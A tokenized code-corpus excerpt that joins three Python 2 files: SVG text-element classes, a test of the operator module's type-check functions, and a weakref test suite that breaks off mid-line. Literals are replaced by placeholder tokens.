<s> '''<STR_LIT>''' <EOL> from attributes import * <EOL> from core import BaseElement , PointAttrib , DeltaPointAttrib , RotateAttrib <EOL> class altGlyphDef ( BaseElement , CoreAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> class altGlyphItem ( BaseElement , CoreAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> class glyphRef ( BaseElement , CoreAttrib , ExternalAttrib , StyleAttrib , FontAttrib , XLinkAttrib , PaintAttrib , PointAttrib , DeltaPointAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_glyphRef ( self , glyphRef ) : <EOL> self . _attributes [ '<STR_LIT>' ] = glyphRef <EOL> def get_glyphRef ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_format ( self , format ) : <EOL> self . _attributes [ '<STR_LIT>' ] = format <EOL> def get_format ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class altGlyph ( glyphRef , ConditionalAttrib , GraphicalEventsAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib , RotateAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . 
get ( '<STR_LIT>' ) <EOL> class textPath ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , XLinkAttrib , FontAttrib , PaintAttrib , GraphicalEventsAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_startOffset ( self , startOffset ) : <EOL> self . _attributes [ '<STR_LIT>' ] = startOffset <EOL> def get_startOffset ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_method ( self , method ) : <EOL> self . _attributes [ '<STR_LIT>' ] = method <EOL> def get_method ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_spacing ( self , spacing ) : <EOL> self . _attributes [ '<STR_LIT>' ] = spacing <EOL> def get_spacing ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class tref ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , XLinkAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . 
_attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> class tspan ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , x = None , y = None , dx = None , dy = None , rotate = None , textLength = None , lengthAdjust = None , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT>' ) <EOL> self . set_x ( x ) <EOL> self . set_y ( y ) <EOL> self . set_dx ( dx ) <EOL> self . set_dy ( dy ) <EOL> self . set_rotate ( rotate ) <EOL> self . set_textLength ( textLength ) <EOL> self . set_lengthAdjust ( lengthAdjust ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . 
get ( '<STR_LIT>' ) <EOL> class text ( BaseElement , CoreAttrib , ConditionalAttrib , ExternalAttrib , StyleAttrib , PointAttrib , DeltaPointAttrib , RotateAttrib , GraphicalEventsAttrib , PaintAttrib , FontAttrib , OpacityAttrib , GraphicsAttrib , CursorAttrib , FilterAttrib , MaskAttrib , ClipAttrib , TextContentAttrib , TextAttrib ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , content = None , x = None , y = None , dx = None , dy = None , rotate = None , textLength = None , lengthAdjust = None , ** kwargs ) : <EOL> BaseElement . __init__ ( self , '<STR_LIT:text>' ) <EOL> if content < > None : <EOL> self . appendTextContent ( content ) <EOL> self . set_x ( x ) <EOL> self . set_y ( y ) <EOL> self . set_dx ( dx ) <EOL> self . set_dy ( dy ) <EOL> self . set_rotate ( rotate ) <EOL> self . set_textLength ( textLength ) <EOL> self . set_lengthAdjust ( lengthAdjust ) <EOL> self . setKWARGS ( ** kwargs ) <EOL> def set_transform ( self , transform ) : <EOL> self . _attributes [ '<STR_LIT>' ] = transform <EOL> def get_transform ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_textLength ( self , textLength ) : <EOL> self . _attributes [ '<STR_LIT>' ] = textLength <EOL> def get_textLength ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) <EOL> def set_lengthAdjust ( self , lengthAdjust ) : <EOL> self . _attributes [ '<STR_LIT>' ] = lengthAdjust <EOL> def get_lengthAdjust ( self ) : <EOL> return self . _attributes . get ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import operator <EOL> import sys <EOL> import unittest <EOL> from test import test_support <EOL> class OperatorTestCase ( unittest . TestCase ) : <EOL> class NewStyle ( object ) : <EOL> pass <EOL> class OldStyle : <EOL> pass <EOL> class HasGetitem ( object ) : <EOL> def __getitem__ ( self , name ) : <EOL> return '<STR_LIT:foo>' <EOL> class HasInt ( object ) : <EOL> def __int__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> class HasLong ( object ) : <EOL> def __long__ ( self ) : <EOL> return <NUM_LIT:1> <EOL> class HasFloat ( object ) : <EOL> def __float__ ( self ) : <EOL> return <NUM_LIT:1.0> <EOL> tests = ( <EOL> ( type , False , False , False ) , <EOL> ( type . __dict__ , False , True , False ) , <EOL> ( globals ( ) , False , True , False ) , <EOL> ( { } , False , True , False ) , <EOL> ( '<STR_LIT>' , False , False , True ) , <EOL> ( u'<STR_LIT>' , False , False , True ) , <EOL> ( [ ] , False , False , True ) , <EOL> ( ( ) , False , False , True ) , <EOL> ( xrange ( <NUM_LIT:5> ) , False , False , True ) , <EOL> ( set ( ) , False , False , False ) , <EOL> ( frozenset ( ) , False , False , False ) , <EOL> ( <NUM_LIT:1> , True , False , False ) , <EOL> ( <NUM_LIT:2> L , True , False , False ) , <EOL> ( <NUM_LIT> , True , False , False ) , <EOL> ( <NUM_LIT> , True , False , False ) , <EOL> ( None , False , False , False ) , <EOL> ( Ellipsis , False , False , False ) , <EOL> ( Exception ( ) , False , False , True ) , <EOL> ( collections . deque ( ) , False , False , True ) , <EOL> ( collections . defaultdict ( ) , False , True , False ) , <EOL> ( collections . namedtuple ( '<STR_LIT:test>' , '<STR_LIT:t>' ) , False , False , False ) , <EOL> ( NewStyle ( ) , False , False , False ) , <EOL> ( OldStyle ( ) , not sys . platform . 
startswith ( '<STR_LIT>' ) , False , False ) , <EOL> ( HasGetitem ( ) , False , True , True ) , <EOL> ( HasInt ( ) , True , False , False ) , <EOL> ( HasFloat ( ) , True , False , False ) , <EOL> ) <EOL> def test_isNumberType ( self ) : <EOL> for obj , isNumberType , _ , _ in self . tests : <EOL> self . assert_istype ( operator . isNumberType , obj , isNumberType ) <EOL> def test_isMappingType ( self ) : <EOL> for obj , _ , isMappingType , _ in self . tests : <EOL> self . assert_istype ( operator . isMappingType , obj , isMappingType ) <EOL> def test_isSequenceType ( self ) : <EOL> for obj , _ , _ , isSequenceType in self . tests : <EOL> self . assert_istype ( operator . isSequenceType , obj , isSequenceType ) <EOL> def assert_istype ( self , func , obj , result ) : <EOL> self . assertEqual ( func ( obj ) , result , '<STR_LIT>' % <EOL> ( type ( obj ) , func . __name__ , result ) ) <EOL> def test_main ( ) : <EOL> test_support . run_unittest ( OperatorTestCase ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> import gc <EOL> import sys <EOL> import unittest <EOL> import UserList <EOL> import weakref <EOL> from test import test_support <EOL> if test_support . is_jython : <EOL> import time <EOL> def extra_collect ( ) : <EOL> """<STR_LIT>""" <EOL> gc . collect ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> gc . collect ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> gc . collect ( ) <EOL> else : <EOL> def extra_collect ( ) : <EOL> pass <EOL> ref_from_del = None <EOL> class C : <EOL> def method ( self ) : <EOL> pass <EOL> class Callable : <EOL> bar = None <EOL> def __call__ ( self , x ) : <EOL> self . bar = x <EOL> def create_function ( ) : <EOL> def f ( ) : pass <EOL> return f <EOL> def create_bound_method ( ) : <EOL> return C ( ) . method <EOL> def create_unbound_method ( ) : <EOL> return C . method <EOL> class TestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cbcalled = <NUM_LIT:0> <EOL> def callback ( self , ref ) : <EOL> self . cbcalled += <NUM_LIT:1> <EOL> class ReferencesTestCase ( TestBase ) : <EOL> def test_basic_ref ( self ) : <EOL> self . check_basic_ref ( C ) <EOL> self . check_basic_ref ( create_function ) <EOL> self . check_basic_ref ( create_bound_method ) <EOL> self . check_basic_ref ( create_unbound_method ) <EOL> o = C ( ) <EOL> wr = weakref . ref ( o ) <EOL> ` wr ` <EOL> del o <EOL> ` wr ` <EOL> def test_basic_callback ( self ) : <EOL> self . check_basic_callback ( C ) <EOL> self . check_basic_callback ( create_function ) <EOL> self . check_basic_callback ( create_bound_method ) <EOL> self . check_basic_callback ( create_unbound_method ) <EOL> def test_multiple_callbacks ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del o <EOL> extra_collect ( ) <EOL> self . assert_ ( ref1 ( ) is None , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( ref2 ( ) is None , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( self . 
cbcalled == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> def test_multiple_selfref_callbacks ( self ) : <EOL> def callback ( object , self = self ) : <EOL> self . ref ( ) <EOL> c = C ( ) <EOL> self . ref = weakref . ref ( c , callback ) <EOL> ref1 = weakref . ref ( c , callback ) <EOL> del c <EOL> def test_proxy_ref ( self ) : <EOL> o = C ( ) <EOL> o . bar = <NUM_LIT:1> <EOL> ref1 = weakref . proxy ( o , self . callback ) <EOL> ref2 = weakref . proxy ( o , self . callback ) <EOL> del o <EOL> def check ( proxy ) : <EOL> proxy . bar <EOL> extra_collect ( ) <EOL> self . assertRaises ( weakref . ReferenceError , check , ref1 ) <EOL> self . assertRaises ( weakref . ReferenceError , check , ref2 ) <EOL> if test_support . is_jython : <EOL> self . assertRaises ( weakref . ReferenceError , bool , ref1 ) <EOL> else : <EOL> self . assertRaises ( weakref . ReferenceError , bool , weakref . proxy ( C ( ) ) ) <EOL> self . assert_ ( self . cbcalled == <NUM_LIT:2> ) <EOL> def check_basic_ref ( self , factory ) : <EOL> o = factory ( ) <EOL> ref = weakref . ref ( o ) <EOL> self . assert_ ( ref ( ) is not None , <EOL> "<STR_LIT>" ) <EOL> o2 = ref ( ) <EOL> self . assert_ ( o is o2 , <EOL> "<STR_LIT>" ) <EOL> def check_basic_callback ( self , factory ) : <EOL> self . cbcalled = <NUM_LIT:0> <EOL> o = factory ( ) <EOL> ref = weakref . ref ( o , self . callback ) <EOL> del o <EOL> extra_collect ( ) <EOL> self . assert_ ( self . cbcalled == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( ref ( ) is None , <EOL> "<STR_LIT>" ) <EOL> def test_ref_reuse ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o ) <EOL> proxy = weakref . proxy ( o ) <EOL> ref2 = weakref . ref ( o ) <EOL> self . assert_ ( ref1 is ref2 , <EOL> "<STR_LIT>" ) <EOL> o = C ( ) <EOL> proxy = weakref . proxy ( o ) <EOL> ref1 = weakref . ref ( o ) <EOL> ref2 = weakref . ref ( o ) <EOL> self . assert_ ( ref1 is ref2 , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . 
getweakrefcount ( o ) == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del proxy <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> def test_proxy_reuse ( self ) : <EOL> o = C ( ) <EOL> proxy1 = weakref . proxy ( o ) <EOL> ref = weakref . ref ( o ) <EOL> proxy2 = weakref . proxy ( o ) <EOL> self . assert_ ( proxy1 is proxy2 , <EOL> "<STR_LIT>" ) <EOL> def test_basic_proxy ( self ) : <EOL> o = C ( ) <EOL> self . check_proxy ( o , weakref . proxy ( o ) ) <EOL> L = UserList . UserList ( ) <EOL> p = weakref . proxy ( L ) <EOL> self . failIf ( p , "<STR_LIT>" ) <EOL> p . append ( <NUM_LIT:12> ) <EOL> self . assertEqual ( len ( L ) , <NUM_LIT:1> ) <EOL> self . failUnless ( p , "<STR_LIT>" ) <EOL> p [ : ] = [ <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> self . assertEqual ( len ( L ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( p ) , <NUM_LIT:2> ) <EOL> self . failUnless ( <NUM_LIT:3> in p , <EOL> "<STR_LIT>" ) <EOL> p [ <NUM_LIT:1> ] = <NUM_LIT:5> <EOL> self . assertEqual ( L [ <NUM_LIT:1> ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( p [ <NUM_LIT:1> ] , <NUM_LIT:5> ) <EOL> L2 = UserList . UserList ( L ) <EOL> p2 = weakref . proxy ( L2 ) <EOL> self . assertEqual ( p , p2 ) <EOL> L3 = UserList . UserList ( range ( <NUM_LIT:10> ) ) <EOL> p3 = weakref . proxy ( L3 ) <EOL> self . assertEqual ( L3 [ : ] , p3 [ : ] ) <EOL> self . assertEqual ( L3 [ <NUM_LIT:5> : ] , p3 [ <NUM_LIT:5> : ] ) <EOL> self . assertEqual ( L3 [ : <NUM_LIT:5> ] , p3 [ : <NUM_LIT:5> ] ) <EOL> self . assertEqual ( L3 [ <NUM_LIT:2> : <NUM_LIT:5> ] , p3 [ <NUM_LIT:2> : <NUM_LIT:5> ] ) <EOL> def test_shared_ref_without_callback ( self ) : <EOL> self . check_shared_without_callback ( weakref . ref ) <EOL> def test_shared_proxy_without_callback ( self ) : <EOL> self . check_shared_without_callback ( weakref . 
proxy ) <EOL> def check_shared_without_callback ( self , makeref ) : <EOL> o = Object ( <NUM_LIT:1> ) <EOL> p1 = makeref ( o , None ) <EOL> p2 = makeref ( o , None ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o ) <EOL> p2 = makeref ( o , None ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o ) <EOL> p2 = makeref ( o ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> del p1 , p2 <EOL> p1 = makeref ( o , None ) <EOL> p2 = makeref ( o ) <EOL> self . assert_ ( p1 is p2 , "<STR_LIT>" ) <EOL> def test_callable_proxy ( self ) : <EOL> o = Callable ( ) <EOL> ref1 = weakref . proxy ( o ) <EOL> self . check_proxy ( o , ref1 ) <EOL> self . assert_ ( type ( ref1 ) is weakref . CallableProxyType , <EOL> "<STR_LIT>" ) <EOL> ref1 ( '<STR_LIT>' ) <EOL> self . assert_ ( o . bar == '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> ref1 ( x = '<STR_LIT>' ) <EOL> self . assert_ ( o . bar == '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> self . assertRaises ( TypeError , ref1 ) <EOL> self . assertRaises ( TypeError , ref1 , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> def check_proxy ( self , o , proxy ) : <EOL> o . foo = <NUM_LIT:1> <EOL> self . assert_ ( proxy . foo == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> o . foo = <NUM_LIT:2> <EOL> self . assert_ ( proxy . foo == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del o . foo <EOL> self . assert_ ( not hasattr ( proxy , '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" ) <EOL> proxy . foo = <NUM_LIT:1> <EOL> self . assert_ ( o . foo == <NUM_LIT:1> , <EOL> "<STR_LIT>" ) <EOL> proxy . foo = <NUM_LIT:2> <EOL> self . assert_ ( <EOL> o . foo == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> del proxy . foo <EOL> self . assert_ ( not hasattr ( o , '<STR_LIT:foo>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_proxy_deletion ( self ) : <EOL> class Foo : <EOL> result = None <EOL> def __delitem__ ( self , accessor ) : <EOL> self . result = accessor <EOL> g = Foo ( ) <EOL> f = weakref . 
proxy ( g ) <EOL> del f [ <NUM_LIT:0> ] <EOL> self . assertEqual ( f . result , <NUM_LIT:0> ) <EOL> def test_proxy_bool ( self ) : <EOL> class List ( list ) : pass <EOL> lyst = List ( ) <EOL> self . assertEqual ( bool ( weakref . proxy ( lyst ) ) , bool ( lyst ) ) <EOL> def test_getweakrefcount ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:2> , <EOL> "<STR_LIT>" ) <EOL> proxy1 = weakref . proxy ( o ) <EOL> proxy2 = weakref . proxy ( o , self . callback ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:4> , <EOL> "<STR_LIT>" ) <EOL> del ref1 , ref2 , proxy1 , proxy2 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefcount ( o ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . getweakrefcount ( <NUM_LIT:1> ) == <NUM_LIT:0> , <EOL> "<STR_LIT>" ) <EOL> def test_getweakrefs ( self ) : <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del ref1 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ref2 ] , <EOL> "<STR_LIT>" ) <EOL> o = C ( ) <EOL> ref1 = weakref . ref ( o , self . callback ) <EOL> ref2 = weakref . ref ( o , self . callback ) <EOL> del ref2 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ref1 ] , <EOL> "<STR_LIT>" ) <EOL> del ref1 <EOL> extra_collect ( ) <EOL> self . assert_ ( weakref . getweakrefs ( o ) == [ ] , <EOL> "<STR_LIT>" ) <EOL> self . assert_ ( weakref . getweakrefs ( <NUM_LIT:1> ) == [ ] , <EOL> "<STR_LIT>" ) <EOL> def test_newstyle_number_ops ( self ) : <EOL> class F ( float ) : <EOL> pass <EOL> f = F ( <NUM_LIT> ) <EOL> p = weakref . proxy ( f ) <EOL> self . assert_ ( p + <NUM_LIT:1.0> == <NUM_LIT> ) <EOL> self . 
assert_ ( <NUM_LIT:1.0> + p == <NUM_LIT> ) <EOL> def test_callbacks_protected ( self ) : <EOL> class BogusError ( Exception ) : <EOL> pass <EOL> data = { } <EOL> def remove ( k ) : <EOL> del data [ k ] <EOL> def encapsulate ( ) : <EOL> f = lambda : ( ) <EOL> data [ weakref . ref ( f , remove ) ] = None <EOL> raise BogusError <EOL> try : <EOL> encapsulate ( ) <EOL> except BogusError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> try : <EOL> encapsulate ( ) <EOL> except BogusError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def test_sf_bug_840829 ( self ) : <EOL> import gc <EOL> class C ( object ) : <EOL> pass <EOL> c = C ( ) <EOL> wr = weakref . ref ( c , lambda ignore : gc . collect ( ) ) <EOL> del c <EOL> del wr <EOL> c1 = C ( ) <EOL> c1 . i = C ( ) <EOL> wr = weakref . ref ( c1 . i , lambda ignore : gc . collect ( ) ) <EOL> c2 = C ( ) <EOL> c2 . c1 = c1 <EOL> del c1 <EOL> del c2 <EOL> def test_callback_in_cycle_1 ( self ) : <EOL> import gc <EOL> class J ( object ) : <EOL> pass <EOL> class II ( object ) : <EOL> def acallback ( self , ignore ) : <EOL> self . J <EOL> I = II ( ) <EOL> I . J = J <EOL> I . wr = weakref . ref ( J , I . acallback ) <EOL> del I , J , II <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_2 ( self ) : <EOL> import gc <EOL> class J ( object ) : <EOL> pass <EOL> class II : <EOL> def acallback ( self , ignore ) : <EOL> self . J <EOL> I = II ( ) <EOL> I . J = J <EOL> I . wr = weakref . ref ( J , I . acallback ) <EOL> del I , J , II <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_3 ( self ) : <EOL> import gc <EOL> class C : <EOL> def cb ( self , ignore ) : <EOL> self . me <EOL> self . c1 <EOL> self . wr <EOL> c1 , c2 = C ( ) , C ( ) <EOL> c2 . me = c2 <EOL> c2 . c1 = c1 <EOL> c2 . wr = weakref . ref ( c1 , c2 . cb ) <EOL> del c1 , c2 <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_4 ( self ) : <EOL> import gc <EOL> class C ( object ) : <EOL> def cb ( self , ignore ) : <EOL> self . 
me <EOL> self . c1 <EOL> self . wr <EOL> class D : <EOL> pass <EOL> c1 , c2 = D ( ) , C ( ) <EOL> c2 . me = c2 <EOL> c2 . c1 = c1 <EOL> c2 . wr = weakref . ref ( c1 , c2 . cb ) <EOL> del c1 , c2 , C , D <EOL> gc . collect ( ) <EOL> def test_callback_in_cycle_resurrection ( self ) : <EOL> import gc <EOL> alist = [ ] <EOL> class C ( object ) : <EOL> def __init__ ( self , value ) : <EOL> self . attribute = value <EOL> def acallback ( self , ignore ) : <EOL> alist . append ( self . c ) <EOL> c1 , c2 = C ( <NUM_LIT:1> ) , C ( <NUM_LIT:2> ) <EOL> c1 . c = c2 <EOL> c2 . c = c1 <EOL> c1 . wr = weakref . ref ( c2 , c1 . acallback ) <EOL> c2 . wr = weakref . ref ( c1 , c2 . acallback ) <EOL> def C_went_away ( ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> wr = weakref . ref ( C , C_went_away ) <EOL> del c1 , c2 , C <EOL> self . assertEqual ( alist , [ ] ) <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( wr ( ) , None ) <EOL> del alist [ : ] <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ ] ) <EOL> def test_callbacks_on_callback ( self ) : <EOL> import gc <EOL> alist = [ ] <EOL> def safe_callback ( ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> class C ( object ) : <EOL> def cb ( self , ignore ) : <EOL> alist . append ( "<STR_LIT>" ) <EOL> c , d = C ( ) , C ( ) <EOL> c . other = d <EOL> d . other = c <EOL> callback = c . cb <EOL> c . wr = weakref . ref ( d , callback ) <EOL> d . wr = weakref . ref ( callback , d . cb ) <EOL> external_wr = weakref . ref ( callback , safe_callback ) <EOL> self . assert_ ( external_wr ( ) is callback ) <EOL> del callback , c , d , C <EOL> self . assertEqual ( alist , [ ] ) <EOL> gc . collect ( ) <EOL> extra_collect ( ) <EOL> self . assertEqual ( alist , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( external_wr ( ) , None ) <EOL> del alist [ : ] <EOL> gc . collect ( ) <EOL> self . assertEqual ( alist , [ ] ) <EOL> def test_gc_during_ref_creation ( self ) : <EOL> self . 
check_gc_during_creation ( weakref . ref ) <EOL> def test_gc_during_proxy_creation ( self ) : <EOL> self . check_gc_during_creation ( weakref . proxy ) <EOL> def check_gc_during_creation ( self , makeref ) : <EOL> if not test_support . is_jython : <EOL> thresholds = gc . get_threshold ( ) <EOL> gc . set_threshold ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> gc . collect ( ) <EOL> class A : <EOL> pass <EOL> def callback ( * args ) : <EOL> pass <EOL> referenced = A ( ) <EOL> a = A ( ) <EOL> a . a = a <EOL> a . wr = makeref ( referenced ) <EOL> try : <EOL> a = A ( ) <EOL> weakref . ref ( referenced , callback ) <EOL> finally : <EOL> if not test_support . is_jython : <EOL> gc . set_threshold ( * thresholds ) <EOL> def test_ref_created_during_del ( self ) : <EOL> class Target ( object ) : <EOL> def __del__ ( self ) : <EOL> global ref_from_del <EOL> ref_from_del = weakref . ref ( self ) <EOL> w = Target ( ) <EOL> class SubclassableWeakrefTestCase ( unittest . TestCase ) : <EOL> def test_subclass_refs ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> def __init__ ( self , ob , callback = None , value = <NUM_LIT> ) : <EOL> self . value = value <EOL> super ( MyRef , self ) . __init__ ( ob , callback ) <EOL> def __call__ ( self ) : <EOL> self . called = True <EOL> return super ( MyRef , self ) . __call__ ( ) <EOL> o = Object ( "<STR_LIT:foo>" ) <EOL> mr = MyRef ( o , value = <NUM_LIT> ) <EOL> self . assert_ ( mr ( ) is o ) <EOL> self . assert_ ( mr . called ) <EOL> self . assertEqual ( mr . value , <NUM_LIT> ) <EOL> del o <EOL> self . assert_ ( mr ( ) is None ) <EOL> self . assert_ ( mr . called ) <EOL> def test_subclass_refs_dont_replace_standard_refs ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> pass <EOL> o = Object ( <NUM_LIT> ) <EOL> r1 = MyRef ( o ) <EOL> r2 = weakref . ref ( o ) <EOL> self . assert_ ( r1 is not r2 ) <EOL> self . assertEqual ( weakref . getweakrefs ( o ) , [ r2 , r1 ] ) <EOL> self . assertEqual ( weakref . 
getweakrefcount ( o ) , <NUM_LIT:2> ) <EOL> r3 = MyRef ( o ) <EOL> self . assertEqual ( weakref . getweakrefcount ( o ) , <NUM_LIT:3> ) <EOL> refs = weakref . getweakrefs ( o ) <EOL> self . assertEqual ( len ( refs ) , <NUM_LIT:3> ) <EOL> self . assert_ ( r2 is refs [ <NUM_LIT:0> ] ) <EOL> self . assert_ ( r1 in refs [ <NUM_LIT:1> : ] ) <EOL> self . assert_ ( r3 in refs [ <NUM_LIT:1> : ] ) <EOL> def test_subclass_refs_dont_conflate_callbacks ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> pass <EOL> o = Object ( <NUM_LIT> ) <EOL> r1 = MyRef ( o , id ) <EOL> r2 = MyRef ( o , str ) <EOL> self . assert_ ( r1 is not r2 ) <EOL> refs = weakref . getweakrefs ( o ) <EOL> self . assert_ ( r1 in refs ) <EOL> self . assert_ ( r2 in refs ) <EOL> def test_subclass_refs_with_slots ( self ) : <EOL> class MyRef ( weakref . ref ) : <EOL> __slots__ = "<STR_LIT>" , "<STR_LIT>" <EOL> def __new__ ( type , ob , callback , slot1 , slot2 ) : <EOL> return weakref . ref . __new__ ( type , ob , callback ) <EOL> def __init__ ( self , ob , callback , slot1 , slot2 ) : <EOL> self . slot1 = slot1 <EOL> self . slot2 = slot2 <EOL> def meth ( self ) : <EOL> return self . slot1 + self . slot2 <EOL> o = Object ( <NUM_LIT> ) <EOL> r = MyRef ( 